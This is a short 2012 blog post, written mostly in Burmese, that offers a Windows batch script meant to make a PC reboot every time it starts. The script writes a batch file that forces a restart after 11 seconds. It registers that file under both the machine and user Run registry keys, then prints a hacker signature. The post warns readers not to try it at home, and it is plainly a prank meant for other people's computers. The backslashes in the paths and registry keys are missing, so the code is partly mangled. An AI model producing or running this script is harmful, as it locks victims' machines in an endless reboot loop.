Wednesday, 2 May 2012

every restart in boot


ဒါေလးေဆာင္ထားပါ။ကုတ္ေတြကိုေအာက္မွာေပးထားတယ္။

သင့္အိမ္မွာမစမ္းပါနဲ႕။ သင့္ window က boot တက္တိုင္း restart ျပန္က်မွာျဖစ္ပါတယ္။

Deepfreeze ပါရင္ေတာ့မတတ္ႏိုင္ဘူးေပါ့ဗ်ာ။





code:



echo @echo off>c:windowshartlell.bat 

echo break off>>c:windowshartlell.bat 

echo shutdown -r -t 11 -f>>c:windowshartlell.bat 

echo end>>c:windowshartlell.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversion un /v startAPI /t reg_sz /d c:windowshartlell.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversion un /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f 

echo Undergroundkyng Strikes Again 

PAUSE